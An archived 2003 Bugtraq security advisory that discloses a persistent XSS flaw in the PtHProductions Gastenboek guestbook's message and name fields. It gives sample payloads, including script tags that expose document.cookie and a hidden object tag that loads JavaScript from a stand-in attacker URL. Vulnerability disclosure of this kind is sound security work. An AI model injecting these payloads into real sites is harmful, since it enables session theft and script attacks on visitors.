Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: PtHProductions Gastenboek - XSS

PtHProductions Gastenboek - XSS

From: morning_wood <se_cur_ity_at_hotmail.com>
Date: Mon, 1 Sep 2003 09:57:43 -0700

------------------------------------------------------------------
          - EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
                -= PtHProductions Gastenboek =-

Donnie Werner
Aug, 29 2003

Vunerability(s):
----------------
1. Persistant XSS injection

Product:
--------
PtHProductions Gastenboek

Description of product:
-----------------------
Guestbook for / by www.pthproductions.be

VUNERABILITY / EXPLOIT
======================
message and name fields allows XSS injection

view - Bekijk gastenboek
post - Teken gastenboek
 
http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>

Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
helpdesk_at_pthproductions.be
Concurrent with this advisory

Credits:
--------
Donnie Werner
morning_wood_at_e2-labs.com
exploited? http://exploitlabs.com
Received on Sep 02 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]